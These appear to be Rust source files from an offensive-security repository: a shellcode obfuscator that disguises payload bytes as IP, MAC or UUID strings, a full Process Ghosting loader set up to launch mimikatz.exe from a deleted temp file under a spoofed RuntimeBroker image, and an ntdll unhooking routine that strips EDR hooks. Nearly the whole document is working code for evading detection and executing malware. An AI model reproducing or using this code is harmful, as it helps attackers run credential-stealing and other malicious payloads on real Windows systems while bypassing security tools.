    #[clap(short, long, required = true, help = "Enter shellcode file")]
    pub file: String,

    #[clap(short, long, required = true, help = "Enter obfuscation type")]
    pub technique: Obfuscation,

    #[clap(short, long, required = true, help = "Specify whether to obfuscate or deobfuscate")]
    pub operation: Operation,
}

#[derive(ValueEnum, Clone, Debug)]
pub enum Obfuscation {
    IPV4,
    IPV6,
    MAC,
    UUID,
}

#[derive(ValueEnum, Clone, Debug)]
pub enum Operation {
    Obfuscate,
    Deobfuscate,
}

// IPv4 Obfuscation
fn obfuscate_ipv4(shellcode: &mut Vec<u8>, output_file: &str) {
    if shellcode.len() % 4 != 0 {
        while shellcode.len() % 4 != 0 {
            shellcode.push(0);
        }
    }
    let mut file = File::create(output_file).expect("Could not create output file");
    for ip_addr in shellcode.chunks(4) {
        let ip = format!("{}.{}.{}.{}", ip_addr[0], ip_addr[1], ip_addr[2], ip_addr[3]);
        writeln!(file, "{}", ip).expect("Could not write to output file");
    }
}

fn deobfuscate_ipv4(file: &str) -> Result<Vec<u8>, ()> {
    let file = File::open(file).map_err(|_| ())?;
    let reader = BufReader::new(file);
    let mut debug: Vec<u8> = Vec::new();

    for line in reader.lines() {
        let ip = line.unwrap().trim().to_string();
        match ip.parse::<Ipv4Addr>() {
            Ok(ip_addr) => debug.extend_from_slice(&ip_addr.octets()),
            Err(_) => return Err(()),
        }
    }
    Ok(debug)
}

// IPv6 Obfuscation
fn obfuscate_ipv6(shellcode: &mut Vec<u8>, output_file: &str) {
    if shellcode.len() % 16 != 0 {
        while shellcode.len() % 16 != 0 {
            shellcode.push(0);
        }
    }
    let mut file = File::create(output_file).expect("Could not create output file");
    for chunk in shellcode.chunks(16) {
        let ip = format!(
            "{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}:{:02x}{:02x}",
            chunk[0], chunk[1], chunk[2], chunk[3], chunk[4], chunk[5], chunk[6], chunk[7],
            chunk[8], chunk[9], chunk[10], chunk[11], chunk[12], chunk[13], chunk[14], chunk[15]
        );
        writeln!(file, "{}", ip).expect("Could not write to output file");
    }
}

fn deobfuscate_ipv6(file: &str) -> Result<Vec<u8>, ()> {
    let file = File::open(file).map_err(|_| ())?;
    let reader = BufReader::new(file);
    let mut deobfuscated_ips: Vec<u8> = Vec::new();

    for line in reader.lines() {
        let ip = line.unwrap().trim().to_string();
        match ip.parse::<Ipv6Addr>() {
            Ok(ip_addr) => {
                for segment in ip_addr.segments() {
                    deobfuscated_ips.extend_from_slice(&segment.to_be_bytes());
                }
            }
            Err(_) => return Err(()),
        }
    }

    Ok(deobfuscated_ips)
}

// MAC Obfuscation
fn obfuscate_mac(shellcode: &mut Vec<u8>, output_file: &str) {
    let mut file = File::create(output_file).expect("Could not create output file");

    let mac_addresses: Vec<String> = shellcode
        .chunks(6)
        .map(|chunk| {
            chunk
                .iter()
                .map(|byte| format!("{:02X}", byte))
                .collect::<Vec<String>>()
                .join(":")
        })
        .collect();

    for mac in &mac_addresses {
        writeln!(file, "{}", mac).expect("Could not write to output file");
    }
}

fn deobfuscate_mac(file: &str) -> Result<Vec<u8>, ()> {
    let file = File::open(file).map_err(|_| ())?;
    let reader = BufReader::new(file);
    let mut original_ints: Vec<u8> = Vec::new();

    for line in reader.lines() {
        let mac = line.unwrap().trim().to_string();
        let bytes: Vec<u8> = mac
            .split(':')
            .map(|byte_str| u8::from_str_radix(byte_str, 16).unwrap())
            .collect();
        original_ints.extend_from_slice(&bytes);
    }

    Ok(original_ints)
}

// UUID Obfuscation
fn obfuscate_uuid(shellcode: &mut Vec<u8>, output_file: &str) {
    let mut file = File::create(output_file).expect("Could not create output file");
    let uuids: Vec<Uuid> = shellcode
        .chunks(16)
        .map(|chunk| {
            let mut array = [0; 16];
            for (i, &byte) in chunk.iter().enumerate() {
                array[i] = byte;
            }
            Uuid::from_bytes(array)
        })
        .collect();

    for uuid in &uuids {
        writeln!(file, "{}", uuid).expect("Could not write to output file");
    }
}

fn deobfuscate_uuid(file: &str) -> Result<Vec<u8>, ()> {
    let file = File::open(file).map_err(|_| ())?;
    let reader = BufReader::new(file);
    let mut desofuscated_bytes = Vec::new();

    for line in reader.lines() {
        let uuid_str = line.unwrap().trim().to_string();
        match Uuid::parse_str(&uuid_str) {
            Ok(uuid) => {
                desofuscated_bytes.extend_from_slice(uuid.as_bytes());
            }
            Err(_) => return Err(()),
        }
    }

    Ok(desofuscated_bytes)
}

fn main() -> std::io::Result<()> {
    let argument = Args::parse();
    let file = argument.file;
    let technique = argument.technique;
    let operation = argument.operation;
    let mut shellcode = File::open(&file)?;
    let mut buffer: Vec<u8> = Vec::new();
    shellcode.read_to_end(&mut buffer)?;

    match operation {
        Operation::Obfuscate => {
            match technique {
                Obfuscation::IPV4 => {
                    obfuscate_ipv4(&mut buffer, "obfuscated_ipv4.txt");
                }
                Obfuscation::IPV6 => {
                    obfuscate_ipv6(&mut buffer, "obfuscated_ipv6.txt");
                },
                Obfuscation::MAC => {
                    obfuscate_mac(&mut buffer, "obfuscated_mac.txt");
                }
                Obfuscation::UUID => {
                    obfuscate_uuid(&mut buffer, "obfuscated_uuid.txt");
                }
            }
            println!("Obfuscation successful, output written to file.");
        }
        Operation::Deobfuscate => {
            let result = match technique {
                Obfuscation::IPV4 => deobfuscate_ipv4(&file),
                Obfuscation::IPV6 => deobfuscate_ipv6(&file),
                Obfuscation::MAC => deobfuscate_mac(&file),
                Obfuscation::UUID => deobfuscate_uuid(&file),
            };

            match result {
                Ok(deobfuscated) => {
                    let mut output_file = File::create("deobfuscated_output.bin")?;
                    output_file.write_all(&deobfuscated)?;
                    println!("Deobfuscation successful, output written to deobfuscated_output.bin");
                }
                Err(_) => {
                    eprintln!("Deobfuscation failed");
                }
            }
        }
    };

    Ok(())
}
```

## ProcessGhosting/src/main.rs
```rust
/*
    Process Ghosting
*/

#![allow(unused_assignments)]

use std::path::Path;
use std::ptr::null_mut;
use winapi::ctypes::c_void;


use ntapi::ntmmapi::{NtAllocateVirtualMemory, NtCreateSection, NtReadVirtualMemory, NtWriteVirtualMemory};
use ntapi::ntobapi::NtClose;
use ntapi::ntpsapi::{NtCreateProcessEx, NtCreateThreadEx, NtCurrentProcess, NtQueryInformationProcess, ProcessBasicInformation, PROCESS_BASIC_INFORMATION};
use ntapi::ntrtl::{RtlCreateProcessParametersEx, RTL_USER_PROCESS_PARAMETERS, RTL_USER_PROC_PARAMS_NORMALIZED};
use ntapi::ntioapi::{FileDispositionInformation, NtOpenFile, NtSetInformationFile, NtWriteFile, 
    FILE_SUPERSEDE, FILE_SYNCHRONOUS_IO_NONALERT, IO_STATUS_BLOCK, PIO_APC_ROUTINE
};

use winapi::shared::minwindef::MAX_PATH;
use winapi::shared::ntdef::{InitializeObjectAttributes, NTSTATUS, NT_SUCCESS, NULL, OBJECT_ATTRIBUTES, UNICODE_STRING};
use winapi::shared::ntstatus::STATUS_SUCCESS;
use winapi::um::fileapi::{CreateFileA, GetFileSize, GetTempFileNameA, GetTempPathA,FILE_DISPOSITION_INFO, OPEN_EXISTING};
use winapi::um::handleapi::{CloseHandle, INVALID_HANDLE_VALUE};
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::memoryapi::{MapViewOfFile, UnmapViewOfFile, VirtualAlloc, FILE_MAP_READ};
use winapi::um::processenv::GetCurrentDirectoryA;
use winapi::um::processthreadsapi::{GetProcessId, GetThreadId};
use winapi::um::userenv::CreateEnvironmentBlock;
use winapi::um::winbase::CreateFileMappingA;
use winapi::um::winnt::{
    DELETE, FILE_ATTRIBUTE_NORMAL, FILE_GENERIC_READ, FILE_GENERIC_WRITE, FILE_SHARE_READ, FILE_SHARE_WRITE, GENERIC_READ,
    IMAGE_DOS_HEADER, IMAGE_DOS_SIGNATURE, IMAGE_FILE_MACHINE_AMD64, IMAGE_NT_HEADERS32, IMAGE_NT_HEADERS64, IMAGE_NT_SIGNATURE,
    LARGE_INTEGER, MEM_COMMIT, MEM_RESERVE, PAGE_READONLY, PAGE_READWRITE, PROCESS_ALL_ACCESS, SECTION_ALL_ACCESS, SEC_IMAGE, 
    SYNCHRONIZE, THREAD_ALL_ACCESS
};

pub mod structs;
use structs::PS_INHERIT_HANDLES;

fn main(){
    // Change the following path !

    const LEGIT_IMG: &str = "C:\\Windows\\system32\\RuntimeBroker.exe coffee"; // payload path
    const PE_FILE: &str =   "C:\\Users\\kavin\\Desktop\\mimikatz.exe";    // target path

    unsafe{    
        println!("[+] PE Payload File: {}", PE_FILE);
        println!("[+] Legit Windows Image: {}", LEGIT_IMG);

        let result = buffer_payload(PE_FILE);

        let mut p_file_buffer: *mut c_void = null_mut();
        let mut dw_file_size: u32 = 0;

        match result {
                Ok((buffer, size)) => {
                    p_file_buffer = buffer;
                    dw_file_size = size;
                    println!("[+] SuccessFully read payload file: SIZE: {}", dw_file_size);
                }

                Err(err) => {
                    eprintln!("[!] Error reading payload file: {}", err);
                    return;
                }
        }
        
        let mut sz_tmp_path: [u8; MAX_PATH] = [0; MAX_PATH];
        let mut sz_tmp_file_name: [u8; MAX_PATH] = [0; MAX_PATH];

        let status = GetTempPathA(
            MAX_PATH as u32, 
            sz_tmp_path.as_mut_ptr() as *mut i8,
        );

        if status == 0{
            prnt_wn_err!("GetTempPathA");
            return;
        }

        let status = GetTempFileNameA(
            sz_tmp_path.as_ptr() as *const i8, 
            "TH".as_ptr() as *const i8, 
            0, 
            sz_tmp_file_name.as_mut_ptr() as *mut i8
        );

        if status == 0{
            prnt_wn_err!("GetTempFileNameA");
            return;
        }

        println!("[+] Created Temp Path: {}", String::from_utf8(sz_tmp_file_name.to_vec()).unwrap());

        let mut h_ghost_section: *mut c_void = null_mut();

        // println!("P File Buffer: {:?}", dw_file_size);

        h_ghost_section = create_ghost_section(
            std::str::from_utf8_mut(sz_tmp_file_name.to_vec().as_mut_slice()).unwrap(),
            p_file_buffer,
            dw_file_size,
        );

        if h_ghost_section.is_null(){
            eprintln!("[!] Error While creating GhostSection");
            return;
        }  

        println!("[*] Ghost Section is Created: {:p}", h_ghost_section);

        if !create_ghost_process(
            LEGIT_IMG,
            h_ghost_section, // target process ghost buffer !
            p_file_buffer, // buffer_payload size 
        ) {
            return;
        }
        return;
    }   

}

fn buffer_payload(path: &str) -> Result<(*mut c_void, u32), String> {
    unsafe {

        let file_handle = CreateFileA(
            path.as_ptr() as *const i8,
            GENERIC_READ,
            FILE_SHARE_READ,
            null_mut(),
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            null_mut(),
        );

        if file_handle == INVALID_HANDLE_VALUE {
            return Err("Failed to open file".to_string());
        }

        println!("[+] CreateFileA Success");

        let map_handle = CreateFileMappingA(
            file_handle, 
            null_mut(), 
            PAGE_READONLY, 
            0, 
            0, 
            null_mut()
        );

        if map_handle.is_null() {
            CloseHandle(file_handle);
            return Err("Failed to create file mapping".to_string());
        }

        println!("[+] CreateFileMappingA Success");

        let mapped_view_address = MapViewOfFile(map_handle, FILE_MAP_READ, 0, 0, 0);

        if mapped_view_address.is_null() {
            CloseHandle(map_handle);
            CloseHandle(file_handle);
            return Err("Failed to map view of file".to_string());
        }

        println!("[+] MapViewOfFile Success");

        let file_size = GetFileSize(file_handle, null_mut());
        let payload_raw = VirtualAlloc(
            null_mut(),
            file_size as usize,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_READWRITE,
        );

        if payload_raw.is_null() {
            let error = format!("Allocate Memory Failed: {}", GetLastError());
            UnmapViewOfFile(mapped_view_address);
            CloseHandle(map_handle);
            CloseHandle(file_handle);
            return Err(error);
        }

        println!("[+] VirtualAlloc Success");

        std::ptr::copy_nonoverlapping(
            mapped_view_address as *const u8,
            payload_raw as *mut u8,
            file_size as usize,
        );

        println!("[+] Payload Copied Successfully");

        UnmapViewOfFile(mapped_view_address);
        CloseHandle(map_handle);
        CloseHandle(file_handle);

        Ok((payload_raw, file_size))
    }
}

unsafe fn get_nt_hdr(pe_buffer: *mut c_void) -> *mut c_void {
    if pe_buffer == NULL {
        return NULL;
    }
    let idh = pe_buffer as *const IMAGE_DOS_HEADER;
    if (*idh).e_magic != IMAGE_DOS_SIGNATURE {
        return NULL;
    }
    const MAX_OFFSET: i32 = 1024;
    let inh_offset = (*idh).e_lfanew;
    if inh_offset > MAX_OFFSET {
        return NULL;
    }
    let inh = (pe_buffer as usize + inh_offset as usize) as *const IMAGE_NT_HEADERS32;
    if (*inh).Signature != IMAGE_NT_SIGNATURE {
        return NULL;
    }
    return inh as *mut c_void;
}

unsafe fn get_pe_architecture(pe_buffer: *mut c_void) -> u16 {
    let inh = get_nt_hdr(pe_buffer);
    if inh == NULL {
        return 0;
    }
    return (*(inh as *const IMAGE_NT_HEADERS32)).FileHeader.Machine;
}

unsafe fn fetch_entry_point_offset(pe_buffer: *mut c_void) -> Option<u32> {
    match get_nt_hdr(pe_buffer) {
        NULL => None,
        inh => match get_pe_architecture(pe_buffer) {
            IMAGE_FILE_MACHINE_AMD64 => {
                let inh = inh as *const IMAGE_NT_HEADERS64;
                Some((*inh).OptionalHeader.AddressOfEntryPoint)
            }
            _ => {
                let inh: *const IMAGE_NT_HEADERS32 = inh as *const IMAGE_NT_HEADERS32;
                Some((*inh).OptionalHeader.AddressOfEntryPoint)
            }
        },
    }
}

#[no_mangle]
pub extern "system" fn rtl_init_unicode_string(us_struct: *mut UNICODE_STRING, buffer: *const u16) {
    unsafe {
        if !buffer.is_null() {
            let mut length: usize = 0;
            let mut ptr = buffer;
            while *ptr != 0 {
                length += 1;
                ptr = ptr.offset(1);
            }
            length *= 2; 

            if length > 0xfffc {
                length = 0xfffc;
            }

            (*us_struct).Buffer = buffer as *mut u16;
            (*us_struct).Length = length as u16;
            (*us_struct).MaximumLength = (length + 2) as u16;
        } else {
            (*us_struct).Buffer = std::ptr::null_mut();
            (*us_struct).Length = 0;
            (*us_struct).MaximumLength = 0;
        }
    }
}

fn create_ghost_section(
        path: &str, 
        payload: *mut c_void,
        size: u32, 
    ) -> *mut c_void{
        let mut wide_string: Vec<_> = format!("\\??\\{}", path).encode_utf16().collect();
        wide_string.push(0x0);

        println!("[+] FilePath: {}", path);
        println!("[+] Payload: {:?}", payload);
        println!("[+] Size: {}", size);
            

        unsafe{
            let mut us_path = std::mem::zeroed::<UNICODE_STRING>();
            // rtl_init_unicode_string(&mut us_path, wide_string.as_ptr());    
            rtl_init_unicode_string(&mut us_path, wide_string.as_ptr());
            let mut attr = std::mem::zeroed::<OBJECT_ATTRIBUTES>();
            
            InitializeObjectAttributes(
                &mut attr, &mut us_path, 0x00000040, NULL, NULL
            );

            let mut status_block = std::mem::zeroed::<IO_STATUS_BLOCK>();
            let mut file_handle: *mut c_void = INVALID_HANDLE_VALUE;
            let mut file_disposition_info: FILE_DISPOSITION_INFO = std::mem::zeroed();
            file_disposition_info.DeleteFile = 1;

            let status = NtOpenFile(
                &mut file_handle,
                DELETE | SYNCHRONIZE | FILE_GENERIC_WRITE | FILE_GENERIC_READ,
                &mut attr,
                &mut status_block,
                FILE_SHARE_READ | FILE_SHARE_WRITE,
                FILE_SUPERSEDE | FILE_SYNCHRONOUS_IO_NONALERT,
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtOpenFile at create_ghost_section", status);
                delete_handle!(file_handle);
                return null_mut();
            }

            println!("[+] NtOpenFile Success");

            let status = NtSetInformationFile(
                file_handle,
                &mut status_block,
                &mut file_disposition_info as *const _ as *mut _,
                size_of::<FILE_DISPOSITION_INFO>() as u32,
                FileDispositionInformation,
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtSetInformationFile", status);
                delete_handle!(file_handle);
                return null_mut();
            }

            println!("[+] NtSetInformationFile Success");

            // writing our payload !
            let mut li = std::mem::zeroed::<LARGE_INTEGER>();

            let status = NtWriteFile(
                file_handle,
                NULL,
                std::mem::zeroed::<PIO_APC_ROUTINE>(),
                NULL,
                &mut status_block,
                payload,
                size,
                &mut li,
                null_mut(),
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtWriteFile", status);
                delete_handle!(file_handle);
                return null_mut();
            }

            println!("[+] NtWriteFile Success");
            
            let mut section_handle: *mut c_void = INVALID_HANDLE_VALUE;
            let status = NtCreateSection(
                &mut section_handle, 
                SECTION_ALL_ACCESS,
                null_mut(),
                null_mut(),
                PAGE_READONLY,
                SEC_IMAGE,     
                file_handle,
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtCreateSection", status);
                delete_handle!(file_handle);
                return null_mut();
            }

            println!("[+] NtCreateSection Success");

            NtClose(file_handle);

            return section_handle            
        }
    
    }

//                                          EXAMINE SCENARIO 1
/*
												Scenario 1:

	pUserProcParms				|---------------------------------------| uUserEnvAndParmsBaseAddress
								|										|
								|			USER PARMAETERS				|
								|										|
								|---------------------------------------| 
								|										|
								|		   ENVIRONMENT BLOCK			|
								|										|
								|---------------------------------------| uUserEnvAndParmsEndAddress

*/

#[inline]
unsafe fn get_current_directory() -> String {
    let mut cur_dir = String::with_capacity(MAX_PATH);
    GetCurrentDirectoryA(MAX_PATH as u32, cur_dir.as_mut_ptr().cast());
    cur_dir
}

#[inline]
unsafe fn get_directory(path: &str) -> Option<&str> {
    let path = Path::new(path);
    match path.parent() {
        Some(parent) => match parent.exists() {
            true => parent.to_str(),
            false => None,
        },
        None => None,
    }
}

pub fn initialize_process_parms(
    h_process: *mut c_void,
    sz_target_process: &str,
    pp_image_base: &mut *mut c_void,
    ) -> bool{

        unsafe{

            let mut status: NTSTATUS = STATUS_SUCCESS;
            let mut us_command_line: UNICODE_STRING = std::mem::zeroed();
            let mut us_nt_image_path: UNICODE_STRING = std::mem::zeroed();
            let mut us_current_directory: UNICODE_STRING = std::mem::zeroed();
            let mut p_user_proc_parms: *mut RTL_USER_PROCESS_PARAMETERS = null_mut();
            let mut p_environment: *mut c_void = null_mut();

            // CREATE FAKE NAMES FOR GHOSTING PROCESS !

            let mut wide_target_path: Vec<_> = sz_target_process.encode_utf16().collect();
            wide_target_path.push(0x0);
            
            let cur_dir = get_current_directory();
            let target_dir = get_directory(sz_target_process).unwrap_or(cur_dir.as_str());

            let mut wide_target_dir: Vec<_> = target_dir.encode_utf16().collect();
            wide_target_dir.push(0x0);

            let dll_dir = "C:\\Windows\\System32";
            let mut wide_dll_dir: Vec<_> = dll_dir.encode_utf16().collect();
            wide_dll_dir.push(0x0);

            
            let create_block = CreateEnvironmentBlock(
                &mut p_environment, 
                null_mut(), 
                1
            );

            let mut proc_info: PROCESS_BASIC_INFORMATION = std::mem::zeroed();

            status = NtQueryInformationProcess(
                h_process, 
                ProcessBasicInformation, 
                &mut proc_info as *mut _ as *mut _, 
                std::mem::size_of::<PROCESS_BASIC_INFORMATION>() as u32, 
                null_mut(), 
            );

            if !NT_SUCCESS(status){
                prnt_nt_wn_err!("NtQueryInformationProcess", status);
                return false;
            }

            println!("[+] Ghost Process PEB: 0x{:?}", proc_info.PebBaseAddress);


            let mut peb: ntapi::ntpebteb::PEB = std::mem::zeroed();

            status = NtReadVirtualMemory(
                h_process,
                proc_info.PebBaseAddress as *mut _,
                &mut peb as *mut _ as *mut _,
                std::mem::size_of::<ntapi::ntpebteb::PEB>() as usize,
                null_mut(),
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtReadVirtualMemory", status);
                return false;
            }

            println!("[+] Ghost Process Image: 0x{:?}", peb.ImageBaseAddress);

            // --- CHECK FROM HERE ! --- // 



            if create_block == 0{
                prnt_wn_err!("CreateEnvironmentBlock");
                return false; 
            }

            // HERE YOU CAN SET THE CUSTOM PATH for the ghost process !
            rtl_init_unicode_string(
                &mut us_command_line,
                wide_target_path.as_ptr() as *const u16,
            );

            rtl_init_unicode_string(
                &mut us_current_directory,
                wide_target_dir.as_ptr() as *const u16,
            );

            rtl_init_unicode_string(
                &mut us_nt_image_path, 
                wide_target_path.as_ptr() as *const u16
            );

            // Create Remote Process !
            status = RtlCreateProcessParametersEx(
                &mut p_user_proc_parms,
                &mut us_nt_image_path,
                null_mut(),
                &mut us_current_directory,
                &mut us_command_line,
                p_environment,
                null_mut(),
                null_mut(),
                null_mut(),
                null_mut(),
                RTL_USER_PROC_PARAMS_NORMALIZED,
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("RtlCreateProcessParametersEx", status);
                return false;
            }

            status = NtReadVirtualMemory(
                h_process,
                proc_info.PebBaseAddress as *mut _,
                &mut peb as *mut _ as *mut _,
                std::mem::size_of::<ntapi::ntpebteb::PEB>() as usize,
                null_mut(),
            );

            if !NT_SUCCESS(status) {
                prnt_nt_wn_err!("NtReadVirtualMemory", status);
                return false;
            }

            *pp_image_base = peb.ImageBaseAddress;

            println!("[+] Examining Scenario 1");

            // Scenario 1 Address
            let mut user_env_and_parms_base_address: *mut c_void = null_mut();

            user_env_and_parms_base_address = p_user_proc_parms as *mut _ as *mut c_void;            

            let mut user_env_and_parms_end_address =
                (p_user_proc_parms as *mut _ as usize) + (*p_user_proc_parms).Length as usize;


                if !(*p_user_proc_parms).Environment.is_null() {
                    let env_start = (*p_user_proc_parms).Environment as usize;
                    if (p_user_proc_parms as *mut _ as usize) > env_start {
                        user_env_and_parms_base_address = (*p_user_proc_parms).Environment;
                    }
            
                    let env_end = env_start + (*p_user_proc_parms).EnvironmentSize as usize;
                    if env_end > user_env_and_parms_end_address {
                        user_env_and_parms_end_address = env_end;
                    }
                }


                let mut user_env_and_parms_size =
                    user_env_and_parms_end_address - (user_env_and_parms_base_address as usize);

                let mut tmp_pntr_address: *mut c_void = user_env_and_parms_base_address;

                status = NtAllocateVirtualMemory(
                    h_process,
                    &mut tmp_pntr_address,
                    0,
                    &mut user_env_and_parms_size,
                    MEM_COMMIT | MEM_RESERVE,
                    PAGE_READWRITE,
                );                        

                if !NT_SUCCESS(status) {
                    prnt_nt_wn_err!("NtAllocateVirtualMemory", status);
                    return false;
                }

                let mut s_num_of_bytes_written = 0;

                // NtWriteVirtualMemory [1]
                
                status = NtWriteVirtualMemory(
                    h_process,
                    p_user_proc_parms as *mut _ as *mut c_void,
                    p_user_proc_parms as *mut _ as *mut c_void,
                    (*p_user_proc_parms).Length as usize,
                    &mut s_num_of_bytes_written,
                );

                if !NT_SUCCESS(status) {
                    prnt_nt_wn_err!("NtWriteVirtualMemory [1]", status);
                    return false;
                }

                // NtWriteVirtualMemory [2]

                if !(*p_user_proc_parms).Environment.is_null() {
                    status = NtWriteVirtualMemory(
                        h_process,
                        (*p_user_proc_parms).Environment,
                        (*p_user_proc_parms).Environment,
                        (*p_user_proc_parms).EnvironmentSize as usize,
                        &mut s_num_of_bytes_written,
                    );

                    if !NT_SUCCESS(status) {
                        prnt_nt_wn_err!("NtWriteVirtualMemory [2]", status);
                        println!("[!] Wrote {} of {} Bytes", s_num_of_bytes_written, (*p_user_proc_parms).EnvironmentSize);
                        
                        return false;
                    }
                }

                // NtWriteVirtualMemory [3]

                status = NtWriteVirtualMemory(
                    h_process,
                    &mut (*proc_info.PebBaseAddress).ProcessParameters as *mut _ as *mut c_void,
                    &mut p_user_proc_parms as *mut _ as *mut c_void,
                    std::mem::size_of::<*mut c_void>(),
                    &mut s_num_of_bytes_written,
                );

                if !NT_SUCCESS(status) {
                    prnt_nt_wn_err!("NtWriteVirtualMemory [3]", status);
                    println!("[!] Wrote {} of {} Bytes", s_num_of_bytes_written, size_of::<*mut c_void>());
                    
                    return false;
                }
        }
    true
}


fn create_ghost_process(
    sz_legit_pe_file: &str,
    mut h_ghost_section: *mut c_void,
    // h_ghost_section: *mut c_void,
    p_payload_pe_buffer: *mut c_void,
) -> bool{
    
    if sz_legit_pe_file.is_empty() || h_ghost_section.is_null() || p_payload_pe_buffer.is_null() {
        return false;
    }

    let mut h_process: *mut c_void = null_mut();
    let mut h_thread: *mut c_void = null_mut();
    let mut p_image_base: *mut c_void = null_mut();
    let mut p_entry_point: *mut c_void = null_mut();
    let mut dw_entry_point_rva: u32 = 0;

    unsafe{

        let status = NtCreateProcessEx(
            &mut h_process,
            PROCESS_ALL_ACCESS,
            null_mut(),
            NtCurrentProcess,
            PS_INHERIT_HANDLES,
            h_ghost_section,
            null_mut(),
            null_mut(),
            0,
        );

        if !NT_SUCCESS(status) {
            prnt_nt_wn_err!("NtCreateProcessEx", status);
            delete_handle!(h_ghost_section);
            delete_handle!(h_process);
            delete_handle!(h_thread);
            return false;
        }
        
        println!("[i] Ghost Process PID: {}", GetProcessId(h_process));
        println!("[i] Initializing Process Parameters...");


        let parms = initialize_process_parms(
            h_process, 
            sz_legit_pe_file, 
            &mut p_image_base,
        );

        if !parms{
            prnt_nt_wn_err!("initialize_process_parms", status);
            delete_handle!(h_ghost_section);
            delete_handle!(h_process);
            delete_handle!(h_thread);
            return false;
        }

        println!("[+] Initialization Completed");
        println!("[+] Payload Buffer: {:?}", p_payload_pe_buffer);

        println!("[*] Looking to find point offset");

        dw_entry_point_rva = match fetch_entry_point_offset(p_payload_pe_buffer){
            Some(offset) => {
                println!("[+] Entry Point Offset: {}", offset);
                offset
            }None => {
                eprintln!("Failed to fetch Entry point offset");
                return false;
            }
        };

        println!("[+] Entry point Fetch Success !");

        p_entry_point = (p_image_base as usize + dw_entry_point_rva as usize) as *mut _;

        println!("[+] Ghost Process Entry Point: {:?}", p_entry_point);

        let status = NtCreateThreadEx(
            &mut h_thread,
            THREAD_ALL_ACCESS,
            null_mut(),
            h_process,
            p_entry_point,
            null_mut(),
            0,
            0x00,
            0x00,
            0x00,
            null_mut(),
        );

        if !NT_SUCCESS(status) {
            prnt_nt_wn_err!("NtCreateThreadEx", status);
            delete_handle!(h_ghost_section);
            delete_handle!(h_process);
            delete_handle!(h_thread);
            return false;
        }

        println!("[*] Payload PE Executed With Thread ID: {}", GetThreadId(h_thread));
        {
            delete_handle!(h_ghost_section);
            delete_handle!(h_process);
            delete_handle!(h_thread);
        }
        
        true
    }
}
```

## dll_injection/dll_unhooking.rs
```rust
/*
    DLL Unhooking 
    Thanks to RedTeamNotes: 
        Resource Used From [https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++]
*/


use std::ffi::CString;
use std::ptr::{self, null_mut};

use winapi::shared::minwindef::HMODULE;
use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING};
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::GetModuleHandleA;
use winapi::um::memoryapi::{MapViewOfFile, VirtualProtect, FILE_MAP_READ};
use winapi::um::psapi::GetModuleInformation;
use winapi::um::winbase::CreateFileMappingA;
use winapi::um::winnt::{GENERIC_READ, IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64, IMAGE_SECTION_HEADER, PAGE_EXECUTE_READWRITE, PAGE_READONLY, SEC_IMAGE};
use winapi::um::{processthreadsapi::GetCurrentProcess, psapi::MODULEINFO};
use winapi::ctypes::c_void;


// macro_rules! error {
//     ($msg:expr, $(arg:expr), *) => {
//         println!("\\_____{} ", format($msg, $(arg), *));
//     }
// }


fn main(){
    unsafe{
        let process: *mut c_void = GetCurrentProcess();
        let mut mi: MODULEINFO = std::mem::zeroed();
        let ntdll_cstr = CString::new("ntdll.dll").unwrap();
        let ntdll_module: HMODULE = GetModuleHandleA(ntdll_cstr.as_ptr());

        GetModuleInformation(
            process,
            ntdll_module,
            &mut mi,
            std::mem::size_of::<MODULEINFO>() as u32,
        );

        let ntdll_base = mi.lpBaseOfDll;
        let ntdll_file = CreateFileA(
            ntdll_cstr.as_ptr(),
            GENERIC_READ,
            0,
            null_mut(),
            OPEN_EXISTING, 
            0,
            null_mut(),
        );

        let ntdll_mapping = CreateFileMappingA(
            ntdll_file, 
            null_mut(), 
            PAGE_READONLY | SEC_IMAGE, 
            0, 
            0, 
            ptr::null(),
        );

        let ntdll_mapping_address = MapViewOfFile(
            ntdll_mapping,
            FILE_MAP_READ,
            0,
            0,
            0
        );

        let hook_dos_header = ntdll_base as *const IMAGE_DOS_HEADER;
        let hook_nt_header = (ntdll_base as usize + (*hook_dos_header).e_lfanew as usize) as *const IMAGE_NT_HEADERS64;

        for i in 0..(*hook_nt_header).FileHeader.NumberOfSections{
            let hook_sec_header = (hook_nt_header as usize + 0xF8 + (i as usize * 0x28)) as *const IMAGE_SECTION_HEADER;

            if (*hook_sec_header).Name.starts_with(b".text\0") {
                let mut old_protect = 0u32;
                let section_base = (ntdll_base as usize + (*hook_sec_header).VirtualAddress as usize) as *mut u8;
                let section_size = *(*hook_sec_header).Misc.VirtualSize() as usize;

                VirtualProtect(
                    section_base as *mut _, 
                    section_size, 
                    PAGE_EXECUTE_READWRITE, 
                    &mut old_protect,
                );

                std::ptr::copy_nonoverlapping(
                    (ntdll_mapping_address as usize + (*hook_sec_header).VirtualAddress as usize) as *const u8, // Source Address
                    section_base, // Destination Address  
                    section_size, // Size 
                );

                VirtualProtect(
                    section_base as *mut _, 
                    section_size,
                    old_protect, 
                    &mut old_protect,
                ); 
            }
        }
        CloseHandle(process);
        CloseHandle(ntdll_file);
        CloseHandle(ntdll_mapping);
        CloseHandle(ntdll_module as *mut c_void);
    }
}

